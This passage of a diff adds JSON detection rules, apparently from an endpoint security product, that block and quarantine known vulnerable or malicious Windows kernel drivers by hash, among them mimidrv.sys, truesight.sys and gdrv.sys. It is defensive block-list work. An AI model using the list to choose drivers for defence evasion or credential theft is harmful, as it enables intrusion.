+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a9ca3709a5e9711846effbabb2b19b74d6827ebf109084335583bd75b7741ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f69da92f-08aa-55b1-b9e6-ceeffb2e4235",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472245Z",
+ "creation_date": "2026-03-23T11:45:30.472248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472257Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7aa4c17afdaff1603ef9b5cc8981bed535555f8185b59d5ae13f342f27ca6c5",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6a23057-5ea4-5c10-a089-6608586baad3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468953Z",
+ "creation_date": "2026-03-23T11:45:30.468957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468967Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34d57107b592c4d2c7d1c95eea1ab7400c09d23864c3870ca3656b5ae81859aa",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6a7b786-1cb2-5abd-b3b3-102a9ea0e606",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466014Z",
+ "creation_date": "2026-03-23T11:45:30.466017Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfc80e0d468a2c115a902aa332a97e3d279b1fc3d32083e8cf9a4aadf3f54ad1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6ac5bf5-66f3-5b05-bb1e-64a62fbab86f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967475Z",
+ "creation_date": "2026-03-23T11:45:29.967477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bff9b75ae2eea49a765f79d9c67c997edb6c67a2cc720c6187dd2f67980acab7",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6ad554f-bb77-5ec5-97f2-0ca898257868",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145525Z",
+ "creation_date": "2026-03-23T11:45:32.145527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95ca14e045618fb38834d17c5cc176162a29d846c1463b840c9129fb9af47c68",
+ "comment": "Vulnerable Kernel Driver (aka szkg64.sys) [https://www.loldrivers.io/drivers/375e8de3-aae4-488d-8273-66744978b45f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6af791f-ac9a-51ec-a7bb-215c31454cfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605770Z",
+ "creation_date": "2026-03-23T11:45:29.605772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3a99e3184b73011f565210e169df27545aacf63e10ceb3c5e35602a698877f5",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6b52d01-97e2-5a5e-bcd3-eefc46cef81e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155787Z",
+ "creation_date": "2026-03-23T11:45:31.155789Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "373d50fcb66000374b9b6b0044e3a456ef2d2acfd4748fa55d00fa71be814493",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6bcb6f6-8875-5727-bbf5-69c98ac0459d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157402Z",
+ "creation_date": "2026-03-23T11:45:31.157408Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6ac74e0b2bdcdd56538498b01483b2ab2e724d82bebe095ff0ca57c51e3b14d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6bee408-bfbc-552a-9b4e-1c39a2715e9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480940Z",
+ "creation_date": "2026-03-23T11:45:31.480944Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480961Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a56b25010995e6bd244bdf59ded80a62986701a1dbf91142148cb41038c7bcf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6c97a80-1704-5e68-9f14-875e260c4a8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485547Z",
+ "creation_date": "2026-03-23T11:45:31.485550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f641ac8749a0fa9c116f61f98061732416665dd6f5899ef3bbd0715a078e3d77",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6d8ee60-e5df-555a-968a-e09f9845202b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823130Z",
+ "creation_date": "2026-03-23T11:45:31.823133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ceb24d0060383f34f6ef3a105df078b357e4119b3ff3739b33add0a2dcaad79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6eb5188-1546-5914-873a-7aa767b10724",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609429Z",
+ "creation_date": "2026-03-23T11:45:29.609431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b213524b22aadcc273142c4b8afc2a6219d6b8b7cab4b41adf9944efb8f46005",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6f33bfb-fc9e-51ce-a6da-dc0ddedec0c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979726Z",
+ "creation_date": "2026-03-23T11:45:29.979728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40e0be2ed5d07d5ecf14232fe64a95c7ad6fd942a60b4a6e21fda69c75bbb78d",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6f3ed1b-b4c6-54ae-bd06-8a5238967a14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470843Z",
+ "creation_date": "2026-03-23T11:45:30.470847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470856Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07f962d8b90f359cf12faa55772d0ef05237ac2fbb2ff7d5cff700df93643e65",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6fc5e61-96df-568d-bd08-5b457de13679",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608670Z",
+ "creation_date": "2026-03-23T11:45:29.608672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608678Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8a7f08a0e8cdd52a35ad54a576dec8c1cd6a1ded6c28422f2e70ae8e8107fbb",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6fe166b-04c4-5903-9bee-218f5182072f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807605Z",
+ "creation_date": "2026-03-23T11:45:31.807607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7dcaf3a048710fe192179f551090eb4c216b0fab5c208996e72baefcc2451e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f700e3e0-2914-56e7-b9fe-55f1305e9f8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159403Z",
+ "creation_date": "2026-03-23T11:45:31.159405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6456b92b1f3dca09c62ce5e9e70d1b8cf82e426f5033b2cba384f6efd710a77",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f706fdea-0c4a-50a8-aa0d-079a6f84e16b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156143Z",
+ "creation_date": "2026-03-23T11:45:31.156145Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85db85f799171057ff4d736e68737b8a464da14c18f4d31e26c43051c3e67de1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f70920ea-9123-54a4-ae2b-900d951734b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473987Z",
+ "creation_date": "2026-03-23T11:45:31.473992Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf960262b1ce57f1eaec06bde3c8d33425e6924b58e71d20634d5b74193a2c46",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7111408-3afd-5b15-90ea-2af16d4e75cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142766Z",
+ "creation_date": "2026-03-23T11:45:32.142768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a32806139db1f02442679cc20c0ca4d30f91c6a42c6205d347cbc374779900d2",
+ "comment": "Vulnerable VirIT Agent System Driver (aka viragt64.sys) [https://www.trendmicro.com/en_no/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f71e4d97-1a98-554b-9e59-cb89c0bf25e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968308Z",
+ "creation_date": "2026-03-23T11:45:29.968311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968321Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "865e4bc7290fc3b380e266ccd98c2d4e965beb711d7efd090d052e8326accdd2",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7284bbd-6c40-5340-8a96-29300f7f912e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816673Z",
+ "creation_date": "2026-03-23T11:45:30.816675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4eebf3fc1a508fe0e54c061a211c44a3df641707adab16ff839187759e8d2a61",
+ "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
